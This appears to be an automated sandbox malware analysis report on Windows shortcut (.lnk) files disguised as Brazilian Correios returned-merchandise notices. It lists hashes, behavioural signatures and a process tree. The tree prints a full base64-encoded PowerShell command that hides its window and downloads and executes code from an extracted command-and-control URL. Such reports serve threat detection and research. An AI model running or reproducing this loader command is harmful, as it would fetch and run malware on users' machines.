Overview
overview
10Static
static
1Mercadoria...0W.lnk
windows7-x64
10Mercadoria...0W.lnk
windows10-2004-x64
10Mercadoria...P8.lnk
windows7-x64
10Mercadoria...P8.lnk
windows10-2004-x64
10Mercadoria...2W.lnk
windows7-x64
10Mercadoria...2W.lnk
windows10-2004-x64
10Mercadoria...XY.lnk
windows7-x64
10Mercadoria...XY.lnk
windows10-2004-x64
10Mercadoria...8J.lnk
windows7-x64
10Mercadoria...8J.lnk
windows10-2004-x64
10Mercadoria...EM.lnk
windows7-x64
10Mercadoria...EM.lnk
windows10-2004-x64
10Mercadoria...25.lnk
windows7-x64
10Mercadoria...25.lnk
windows10-2004-x64
10Mercadoria...01.lnk
windows7-x64
10Mercadoria...01.lnk
windows10-2004-x64
10Analysis
-
max time kernel
93s -
max time network
94s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13-09-2024 19:03
Static task
static1
Behavioral task
behavioral1
Sample
Mercadoria_Devolvida-Correios-0JY43R0W.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Mercadoria_Devolvida-Correios-0JY43R0W.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Mercadoria_Devolvida-Correios-1A4D7UP8.lnk
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Mercadoria_Devolvida-Correios-1A4D7UP8.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
Mercadoria_Devolvida-Correios-1EI6TV2W.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Mercadoria_Devolvida-Correios-1EI6TV2W.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
Mercadoria_Devolvida-Correios-1SNBA8XY.lnk
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Mercadoria_Devolvida-Correios-1SNBA8XY.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
Resource
win7-20240708-en
Behavioral task
behavioral10
Sample
Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
Mercadoria_Devolvida-Correios-1YMU5EEM.lnk
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
Mercadoria_Devolvida-Correios-1YMU5EEM.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
Mercadoria_Devolvida-Correios-22ES4D25.lnk
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
Mercadoria_Devolvida-Correios-22ES4D25.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
Resource
win10v2004-20240802-en
General
-
Target
Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
-
Size
3KB
-
MD5
246e74b6fffb9d5994f7f70bb6509b45
-
SHA1
4b7bdf4808ce987b9f94ea40bdd081217867483a
-
SHA256
0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
-
SHA512
178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
Extracted
https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 2972 powershell.exe 6 2972 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2972 powershell.exe 2972 powershell.exe 2972 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2972 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3712 wrote to memory of 2972 3712 cmd.exe 84 PID 3712 wrote to memory of 2972 3712 cmd.exe 84 PID 2972 wrote to memory of 3500 2972 powershell.exe 85 PID 2972 wrote to memory of 3500 2972 powershell.exe 85 PID 3500 wrote to memory of 3128 3500 csc.exe 87 PID 3500 wrote to memory of 3128 3500 csc.exe 87
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-2CM0TJ01.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zgjijgp4\zgjijgp4.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E92.tmp" "c:\Users\Admin\AppData\Local\Temp\zgjijgp4\CSCC31D16DAAA7432E8A51821572784C.TMP"4⤵PID:3128
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58ac2ddf27a57e928b50c3c7d8e642257
SHA1e812dcc321b9f63c12ce022b556190550c287c84
SHA25684dddd374ec1579a984ab46898c697fa898e9f6f27b0af15e76fc0830eeea86c
SHA512190b71c23e5dec843e60b0e8ee33cab08895678062b2ca6800a24aac6a7d3bfa0f2bd5c443cd8354f60b13f7cb85fc1829ef132f34a5d4b4898aff4ba1fc6985
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD530bc7e6db92e23a64dba1f75299b0c3f
SHA16256f6350f441c4a14ee7896bb5172b34cebe639
SHA256c5b89b230f9e0e756c3b9c4865c66fecc64e3269f8cada2dde4ff39eddaf2aae
SHA5122f73e186442bd2e5c239523f968f2410b902a6154ebb50edd2aea24cd5773b594ff581c2ce683dedafd1ba326d7988227eb78c03a61937900e3dc046c2a6193b
-
Filesize
652B
MD5ef61dd7dd76a1773f7fa983fcd7d42cd
SHA1c3229b237696f551385a91f7e6d450012afe7930
SHA25640114996e3fa0b248a6002398d2e54ec27ea17504c4a9383abaa1c0d3ab39949
SHA512fa05b128b7bb671ce7e48c46328e44bb9efd1f68d0260cb6d5a5dc157fb1cc9ad62070d5674f57be972e72924d193e81f76b8e04367185e49005e0e74e1dff17
-
Filesize
187B
MD57b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA2566caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA5127322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
-
Filesize
369B
MD5953db8ee5b3d6eb6a769bca0fccc6632
SHA1f30ced906d2802fdf05357ee93e48ac38bbb4775
SHA2569a80a9bc63f23d2587856fddd6e7d69fafd6d7c595ccbb8a67c0c18a41f47357
SHA5122c3901bde299c5088105f211ef12208172868211d73ff6837c2ad694402225b10129bfde2a89e93e0cfb823d769371be0bfa596727532ad7854a41d7a442b153